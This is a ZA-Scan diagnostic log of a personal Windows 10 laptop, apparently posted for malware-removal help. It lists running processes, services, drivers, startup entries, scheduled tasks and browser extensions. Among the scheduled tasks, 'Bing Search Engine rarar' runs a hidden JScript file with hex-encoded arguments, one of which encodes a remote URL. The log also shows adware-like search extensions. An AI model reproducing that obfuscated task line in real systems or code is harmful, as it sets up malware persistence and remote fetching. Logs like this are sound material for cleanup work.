ZA-Scan V1.0.0.5 Updated 24-October-2017
Tool run by AnaGlaucia on 23/01/2018 at 20:32:49,93.
Microsoft Windows 10 Home Single Language 10.0.15063 x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\AnaGlaucia\Downloads\ZA-Scan.exe

[Z-Analyse Scan]

==== Running Processes ======================

C:\PROGRA~2\GbPlugin\GbpSv.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Lenovo\Lenovo Smart Update\Lenovo Smart Update Service.exe
C:\Program Files (x86)\Unchecky\bin\unchecky_svc.exe
C:\PROGRA~2\GbPlugin\GbpSv.exe
C:\Program Files (x86)\Unchecky\bin\unchecky_bg.exe
C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Users\AnaGlaucia\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\uTorrent.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Users\AnaGlaucia\AppData\Local\MEGAsync\MEGAsync.exe
C:\Program Files (x86)\Lenovo EasyCamera\Monitor.exe
C:\Program Files (x86)\Lenovo\Lenovo Smart Update\Lenovo Smart Update.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\Lenovo\YouCam\YouCamTray.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\updates\3.5.1_44332\utorrentie.exe
C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\updates\3.5.1_44332\utorrentie.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\WINDOWS\SysWOW64\ctfmon.exe
C:\Users\AnaGlaucia\Downloads\ZA-Scan.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\Users\ANAGLA~1\AppData\Local\Temp\ZAScan.exe

==== Services(whitelist) ======================

Powered by [url=http://www.antimalwarehelp.be/EDev/]E Dev[/url]

R2 - [AdobeARMservice] - Adobe Acrobat Update Service - c:\program files (x86)\common files\adobe\arm\1.0\armsvc.exe
R2 - [Apple Mobile Device] - Apple Mobile Device - c:\program files (x86)\common files\apple\mobile device support\applemobiledeviceservice.exe
R2 - [Bonjour Service] - Serviço do Bonjour - c:\program files\bonjour\mdnsresponder.exe
R2 - [DbxSvc] - DbxSvc - c:\windows\system32\dbxsvc.exe
R2 - [GbpSv] - Gbp Service - c:\progra~2\gbplugin\gbpsv.exe
R2 - [Intel(R) Capability Licensing Service Interface] - Intel(R) Capability Licensing Service Interface - c:\program files\intel\icls client\heciserver.exe
R2 - [jhi_service] - Intel(R) Dynamic Application Loader Host Interface Service - c:\program files (x86)\intel\intel(r) management engine components\dal\jhi_service.exe
R2 - [Lenovo Smart Update Service] - Lenovo Smart Update Service - c:\program files (x86)\lenovo\lenovo smart update\lenovo smart update service.exe
R2 - [LMS] - Intel(R) Management and Security Application Local Management Service - c:\program files (x86)\intel\intel(r) management engine components\lms\lms.exe
R2 - [SecurityHealthService] - Serviço da Central de Segurança do Windows Defender - c:\windows\system32\securityhealthservice.exe
R2 - [SynTPEnhService] - SynTPEnh Caller Service - c:\program files\synaptics\syntp\syntpenhservice.exe
R2 - [TrueKey] - Intel Security True Key - c:\program files\truekey\mcafee.truekey.service.exe
R2 - [TrueKeyScheduler] - Intel Security True Key Scheduler - c:\program files\truekey\mctkschedulerservice.exe
R2 - [Unchecky] - Unchecky - c:\program files (x86)\unchecky\bin\unchecky_svc.exe
R2 - [UNS] - Intel(R) Management and Security Application User Notification Service - c:\program files (x86)\intel\intel(r) management engine components\uns\uns.exe
R2 - [Warsaw Technology] - Warsaw Technology - c:\program files\diebold\warsaw\core.exe
R2 - [WSearch] - Windows Search - c:\windows\system32\searchindexer.exe
R3 - [aswbIDSAgent] - aswbIDSAgent - c:\program files\avast software\avast\x64\aswidsagenta.exe
R3 - [ICCS] - Intel(R) Integrated Clock Controller Service - Intel(R) ICCS - c:\program files (x86)\intel\intel(r) integrated clock controller service\iccproxy.exe
R3 - [iPod Service] - iPod Service - c:\program files\ipod\bin\ipodservice.exe
S2 - [dbupdate] - Serviço Atualização do Dropbox (dbupdate) - c:\program files (x86)\dropbox\update\dropboxupdate.exe
S2 - [gupdate] - Serviço do Google Update (gupdate) - c:\program files (x86)\google\update\googleupdate.exe
S2 - [MBAMService] - MBAMService - c:\program files (x86)\malwarebytes anti-malware\mbamservice.exe
S2 - [sppsvc] - Proteção de Software - c:\windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe
S3 - [ALG] - Serviço Gateway de Camada de Aplicativo - c:\windows\system32\alg.exe
S3 - [COMSysApp] - COM+ System Application - c:\windows\system32\dllhost.exe
S3 - [cphs] - Intel(R) Content Protection HECI Service - c:\windows\syswow64\intelcphecisvc.exe
S3 - [dbupdatem] - Serviço Atualização do Dropbox (dbupdatem) - c:\program files (x86)\dropbox\update\dropboxupdate.exe
S3 - [diagnosticshub.standardcollector.service] - Serviço Coletor de Padrões de Hub de Diagnóstico da Microsoft (R) - c:\windows\system32\diagsvcs\diagnosticshub.standardcollector.service.exe
S3 - [Fax] - Fax - c:\windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - c:\windows\microsoft.net\framework64\v3.0\wpf\presentationfontcache.exe
S3 - [gupdatem] - Serviço do Google Update (gupdatem) - c:\program files (x86)\google\update\googleupdate.exe
S3 - [gusvc] - Google Software Updater - c:\program files (x86)\google\common\google updater\googleupdaterservice.exe
S3 - [McComponentHostService] - McAfee Security Scan Component Host Service - c:\program files\mcafee security scan\3.11.500\mcchsvc.exe
S3 - [MSDTC] - Coordenador de transações distribuídas - c:\windows\system32\msdtc.exe
S3 - [msiserver] - Windows Installer - c:\windows\system32\msiexec.exe
S3 - [PerfHost] - Host de DLL de Contador de Desempenho - c:\windows\syswow64\perfhost.exe
S3 - [RpcLocator] - Alocador Remote Procedure Call (RPC) - c:\windows\system32\locator.exe
S3 - [SensorDataService] - Serviço de Dados de Sensor - c:\windows\system32\sensordataservice.exe
S3 - [SNMPTRAP] - Interceptação SNMP - c:\windows\system32\snmptrap.exe
S3 - [spectrum] - Serviço de Percepção do Windows - c:\windows\system32\spectrum.exe
S3 - [TieringEngineService] - Gerenciamento de Camadas de Armazenamento - c:\windows\system32\tieringengineservice.exe
S3 - [TrueKeyServiceHelper] - Intel Security True Key Helper Service - c:\program files\truekey\mcafee.truekey.servicehelper.exe
S3 - [TrustedInstaller] - Instalador de Módulos do Windows - c:\windows\servicing\trustedinstaller.exe
S3 - [vds] - Disco Virtual - c:\windows\system32\vds.exe
S3 - [VSS] - Cópia de Sombra de Volume - c:\windows\system32\vssvc.exe
S3 - [wbengine] - Serviço de Mecanismo de Backup em Nível de Bloco - c:\windows\system32\wbengine.exe
S3 - [WdNisSvc] - Serviço de Inspeção de Rede do Windows Defender Antivirus - c:\program files\windows defender\nissrv.exe
S3 - [WinDefend] - Serviço Windows Defender Antivirus - c:\program files\windows defender\msmpeng.exe
S3 - [wmiApSrv] - Adaptador de Desempenho WMI - c:\windows\system32\wbem\wmiapsrv.exe
S3 - [WMPNetworkSvc] - Serviço de Compartilhamento de Rede do Windows Media Player - c:\program files\windows media player\wmpnetwk.exe

==== Drivers(whitelist) ======================

Powered by [url=http://www.antimalwarehelp.be/EDev/]E Dev[/url]

R0 - [aswbidsh] - aswbidsh - C:\WINDOWS\system32\Drivers\aswbidsh.sys [x]
R0 - [aswblog] - aswblog - C:\WINDOWS\system32\Drivers\aswblog.sys [x]
R0 - [aswbuniv] - aswbuniv - C:\WINDOWS\system32\Drivers\aswbuniv.sys [x]
R0 - [FileInfo] - File Information FS MiniFilter - C:\WINDOWS\system32\Drivers\FileInfo.sys
R0 - [FltMgr] - FltMgr - C:\WINDOWS\system32\Drivers\FltMgr.sys
R0 - [Mup] - Mup - C:\WINDOWS\system32\Drivers\Mup.sys
R0 - [Wof] - Windows Overlay File System Filter Driver - C:\WINDOWS\system32\Drivers\Wof.sys
R1 - [NetBIOS] - NetBIOS Interface - C:\WINDOWS\system32\Drivers\NetBIOS.sys
R2 - [srv] - Driver SMB 1.xxx do Servidor - C:\WINDOWS\system32\Drivers\srv.sys
R3 - [srv2] - Driver SMB 2.xxx do Servidor - C:\WINDOWS\system32\Drivers\srv2.sys
R0 - [ACPI] - Microsoft ACPI Driver - C:\WINDOWS\system32\Drivers\ACPI.sys
R0 - [acpiex] - Microsoft ACPIEx Driver - C:\WINDOWS\system32\Drivers\acpiex.sys
R0 - [aswRvrt] - aswRvrt - C:\WINDOWS\system32\Drivers\aswRvrt.sys
R0 - [aswVmm] - aswVmm - C:\WINDOWS\system32\Drivers\aswVmm.sys
R0 - [CLFS] - Common Log (CLFS) - C:\WINDOWS\system32\Drivers\CLFS.sys
R0 - [CNG] - CNG - C:\WINDOWS\system32\Drivers\CNG.sys
R0 - [Disk] - Driver de disco - C:\WINDOWS\system32\Drivers\Disk.sys
R0 - [EhStorClass] - Enhanced Storage Filter Driver - C:\WINDOWS\system32\Drivers\EhStorClass.sys
R0 - [fvevol] - Driver de Filtro de Criptografia de Unidade de Disco BitLocker - C:\WINDOWS\system32\Drivers\fvevol.sys
R0 - [iaStorA] - iaStorA - C:\WINDOWS\system32\Drivers\iaStorA.sys
R0 - [intelpep] - Driver Intel(R) Power Engine Plug-in - C:\WINDOWS\system32\Drivers\intelpep.sys
R0 - [iorate] - Driver do Filtro de Taxa de E/S de Disco - C:\WINDOWS\system32\Drivers\iorate.sys
R0 - [KSecDD] - KSecDD - C:\WINDOWS\system32\Drivers\KSecDD.sys
R0 - [KSecPkg] - KSecPkg - C:\WINDOWS\system32\Drivers\KSecPkg.sys
R0 - [LHDmgr] - LHDmgr - C:\WINDOWS\system32\Drivers\LHDmgr.sys [x]
R0 - [mountmgr] - Gerenciador de Pontos de Montagem - C:\WINDOWS\system32\Drivers\mountmgr.sys
R0 - [msisadrv] - msisadrv - C:\WINDOWS\system32\Drivers\msisadrv.sys
R0 - [NDIS] - Driver do Sistema NDIS - C:\WINDOWS\system32\Drivers\NDIS.sys
R0 - [partmgr] - Driver de partição - C:\WINDOWS\system32\Drivers\partmgr.sys
R0 - [pci] - PCI Bus Driver - C:\WINDOWS\system32\Drivers\pci.sys
R0 - [pcw] - Performance Counters for Windows Driver - C:\WINDOWS\system32\Drivers\pcw.sys
R0 - [pdc] - pdc - C:\WINDOWS\system32\Drivers\pdc.sys
R0 - [rdyboost] - ReadyBoost - C:\WINDOWS\system32\Drivers\rdyboost.sys
R0 - [spaceport] - Driver de Espaços de Armazenamento - C:\WINDOWS\system32\Drivers\spaceport.sys
R0 - [Tcpip] - Driver de Protocolo TCP/IP - C:\WINDOWS\system32\Drivers\Tcpip.sys
R0 - [vdrvroot] - Enumerador de Unidade Virtual Microsoft - C:\WINDOWS\system32\Drivers\vdrvroot.sys
R0 - [volmgr] - Driver de Gerenciador de Volumes - C:\WINDOWS\system32\Drivers\volmgr.sys
R0 - [volmgrx] - Gerenciador de Volume Dinâmico - C:\WINDOWS\system32\Drivers\volmgrx.sys
R0 - [volsnap] - Volume Shadow Copy driver - C:\WINDOWS\system32\Drivers\volsnap.sys
R0 - [volume] - Driver do volume - C:\WINDOWS\system32\Drivers\volume.sys
R0 - [Wdf01000] - Serviço de Estruturas de Driver em Modo Kernel - C:\WINDOWS\system32\Drivers\Wdf01000.sys
R0 - [WFPLWFS] - Plataforma para Filtros do Microsoft Windows - C:\WINDOWS\system32\Drivers\WFPLWFS.sys
R0 - [WindowsTrustedRT] - Windows Trusted Execution Environment Class Extension - C:\WINDOWS\system32\Drivers\WindowsTrustedRT.sys
R0 - [WindowsTrustedRTProxy] - Serviço de Proteção de Tempo de Execução Confiável do Microsoft Windows - C:\WINDOWS\system32\Drivers\WindowsTrustedRTProxy.sys
R1 - [AFD] - Ancillary Function Driver for Winsock - C:\WINDOWS\system32\Drivers\AFD.sys
R1 - [Beep] - Beep - C:\WINDOWS\system32\Drivers\Beep.sys
R1 - [tdx] - Driver de Suporte a TDI Herdado de NetIO - C:\WINDOWS\system32\Drivers\tdx.sys
R2 - [tcpipreg] - TCP/IP Registry Compatibility - C:\WINDOWS\system32\Drivers\tcpipreg.sys
S0 - [hwpolicy] - Hardware Policy Driver - C:\WINDOWS\system32\Drivers\hwpolicy.sys
S3 - [atapi] - Canal de IDE - C:\WINDOWS\system32\Drivers\atapi.sys
S3 - [Tcpip6] - @todo.dll,-100;Microsoft IPv6 Protocol Driver - C:\WINDOWS\system32\Drivers\Tcpip6.sys [x]

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDriveSetup"="C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDriveSetup"="C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup"

[HKEY_USERS\S-1-5-21-3965318276-2551654934-727219755-1001\Software\Microsoft\Windows\CurrentVersion\Run]
"EPSON Stylus CX4200 Series"="C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIAEA.EXE /FU C:\WINDOWS\TEMP\E_S295F.tmp /EF HKCU"
"GoogleDriveSync"="C:\Program Files (x86)\Google\Drive\googledrivesync.exe /autostart"
"OneDrive"="C:\Users\AnaGlaucia\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"
"uTorrent"="C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Lenovo EasyCamera_Monitor"="C:\Program Files (x86)\Lenovo EasyCamera\monitor.exe"
"Smart Update"="C:\Program Files (x86)\Lenovo\Lenovo Smart Update\Lenovo Smart Update.exe -s"
"YouCam Mirage"="C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe"
"YouCam Tray"="C:\Program Files (x86)\Lenovo\YouCam\YouCamTray.exe /s"
"iTunesHelper"="C:\Program Files (x86)\iTunes\iTunesHelper.exe"
"Dropbox"="C:\Program Files (x86)\Dropbox\Client\Dropbox.exe /systemstartup"
"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"EPSON Stylus CX4200 Series"="C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIAEA.EXE /FU C:\WINDOWS\TEMP\E_S295F.tmp /EF HKCU"
"GoogleDriveSync"="C:\Program Files (x86)\Google\Drive\googledrivesync.exe /autostart"
"OneDrive"="C:\Users\AnaGlaucia\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"
"uTorrent"="C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\WINDOWS\system32\igfxtray.exe"
"HotKeysCmds"="C:\WINDOWS\system32\hkcmd.exe"
"Persistence"="C:\WINDOWS\system32\igfxpers.exe"
"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"
"Energy Management"="C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe"
"EnergyUtility"="C:\Program Files (x86)\Lenovo\Energy Management\Utility.exe"
"AvastUI.exe"="C:\Program Files\AVAST Software\Avast\AvLaunch.exe /gui"
"SecurityHealth"="%ProgramFiles%\Windows Defender\MSASCuiL.exe"
"SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe "

==== Startup Folders ======================

2015-01-30 22:49:10 1670 --sha-w- C:\Users\AnaGlaucia\AppData\Roaming\Microsoft\LastFlashConfig.wfc

==== Task Scheduler Jobs ======================

C:\WINDOWS\tasks\Adobe Flash Player PPAPI Notifier.job --a-------- C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_162_pepper.exe [17/09/2016 14:20]
C:\WINDOWS\tasks\Adobe Flash Player Updater.job --a-------- C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [17/09/2016 14:20]
C:\WINDOWS\tasks\DropboxUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [04/11/2016 21:17]
C:\WINDOWS\tasks\DropboxUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [04/11/2016 21:17]
C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001Core.job --a-------- C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe []
C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001UA.job --a-------- C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe []
C:\WINDOWS\tasks\Synaptics TouchPad Enhancements.job --a-------- C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [03/06/2015 04:16]

==== Other Scheduled Tasks ======================

"C:\WINDOWS\SysNative\tasks\Adobe Acrobat Update Task" [C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe]
"C:\WINDOWS\SysNative\tasks\Adobe Flash Player PPAPI Notifier" [C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_162_pepper.exe]
"C:\WINDOWS\SysNative\tasks\Adobe Flash Player Updater" [C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\WINDOWS\SysNative\tasks\Avast Emergency Update" [C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe]
"C:\WINDOWS\SysNative\tasks\Bing Search Engine rarar" [C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{C6D303B0-4C91-8976-CA57-173450159CFA}\dafi.txt" "687474703a2f2f77617662736c792e636f6d" "433a5c50726f6772616d446174615c7b43364433303342302d344339312d383937362d434135372d3137333435303135394346417d5c6c656c616c69" "433a5c50726f6772616d446174615c7b43364433303342302d344339312d383937362d434135372d3137333435303135394346417d5c6c697369636f73" "//B" "//E:jscript" "--IsErIk"]
"C:\WINDOWS\SysNative\tasks\CreateExplorerShellUnelevatedTask" [C:\WINDOWS\explorer.exe]
"C:\WINDOWS\SysNative\tasks\Dolby Selector" [C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe]
"C:\WINDOWS\SysNative\tasks\DropboxUpdateTaskMachineCore" [C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe]
"C:\WINDOWS\SysNative\tasks\DropboxUpdateTaskMachineUA" [C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe]
"C:\WINDOWS\SysNative\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001Core" [C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe]
"C:\WINDOWS\SysNative\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001UA" [C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe]
"C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\WINDOWS\SysNative\tasks\MirageAgent" [C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe]
"C:\WINDOWS\SysNative\tasks\OneDrive Standalone Update Task-S-1-5-21-3965318276-2551654934-727219755-1001" [%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe]
"C:\WINDOWS\SysNative\tasks\RtHDVBg_Dolby" ["C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe"]
"C:\WINDOWS\SysNative\tasks\RTKCPL" ["C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe"]
"C:\WINDOWS\SysNative\tasks\SafeZone scheduled Autoupdate 1468516578" [C:\Program Files\AVAST Software\SZBrowser\launcher.exe]
"C:\WINDOWS\SysNative\tasks\Synaptics TouchPad Enhancements" [C:\Program Files\Synaptics\SynTP\SynTPEnh.exe]
"C:\WINDOWS\SysNative\tasks\User_Feed_Synchronization-{C1D8E56A-EDF5-45CB-B216-E6A462B549CB}" [C:\WINDOWS\system32\msfeedssync.exe]
"C:\WINDOWS\SysNative\tasks\Apple\AppleSoftwareUpdate" [C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe]
"C:\WINDOWS\SysNative\tasks\AVAST Software\Avast settings backup" [C:\Program Files\Common Files\AV\avast Antivirus\backup.exe]
"C:\WINDOWS\SysNative\tasks\AVAST Software\Overseer" [C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe]
"C:\WINDOWS\SysNative\tasks\MEGA\MEGAsync Update Task S-1-5-21-3965318276-2551654934-727219755-1001" [C:\Users\AnaGlaucia\AppData\Local\MEGAsync\MEGAupdater.exe]

==== Chromium Look ======================

Google Chrome Version: 46.0.2490.86

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
eofcbnmajmjmplflapaojjnihcjkigck - No path found[]
gomekmidlodglbbmalcneegieacbdmki - No path found[]
olojcnagmcbplpdddabmpfehhlleobpb - No path found[]

HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\Extensions
lmjegmlicamnimmfhcmpkclmigmmcbeh - No path found[]
olojcnagmcbplpdddabmpfehhlleobpb - No path found[]

Slides - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek
Docs - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Sheets - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap
EasyPDFCombine - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\fncbkmmlcehhipmmofdhejcggdapcmon
Google Docs Offline - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Search Extension by Ask - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgfehfbnofiffladdncogfobimealokp
Google Drive App Launcher - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh
Chrome Web Store Payments - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Search Manager - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\olojcnagmcbplpdddabmpfehhlleobpb
Gmail - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Chrome Media Router - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm

==== IE Start and Search Settings ======================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="https://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-c64a8af2"
"Search Page"="http://www.google.com"
"Default_Search_URL"="http://www.google.com"
"Default_Page_URL"="http://www.google.com"
"Search Bar"="https://www.google.com/?trackid=sp-006"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="https://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-c64a8af2"

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]
"Start Page"="https://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-c64a8af2"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

==== All HKLM and HKCU SearchScopes ======================

HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - https://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-c64a8af2&q={searchTerms}
HKLM\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - https://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-c64a8af2&q={searchTerms}
HKLM\Wow6432Node\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKCU\SearchScopes "DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - https://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-c64a8af2&q={searchTerms}
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE02
HKCU\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} - http://www.google.com/search?q={searchTerms}

==== HijackThis Entries ======================

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.google.com/?trackid=sp-006
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
F2 - REG:system.ini: UserInit=
O2 - BHO: True Key Helper - {0F4B8786-5502-4803-8EBC-F652A1153BB6} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: G-Buster Browser Defense Itaú Unibanco - {C41A1C0E-EA6C-11D4-B1B8-444553540008} - C:\PROGRAM FILES (X86)\GBPLUGIN\gbiehuni.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll
O3 - Toolbar: True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab

==== EOF on 23/01/2018 at 21:02:03,07 ======================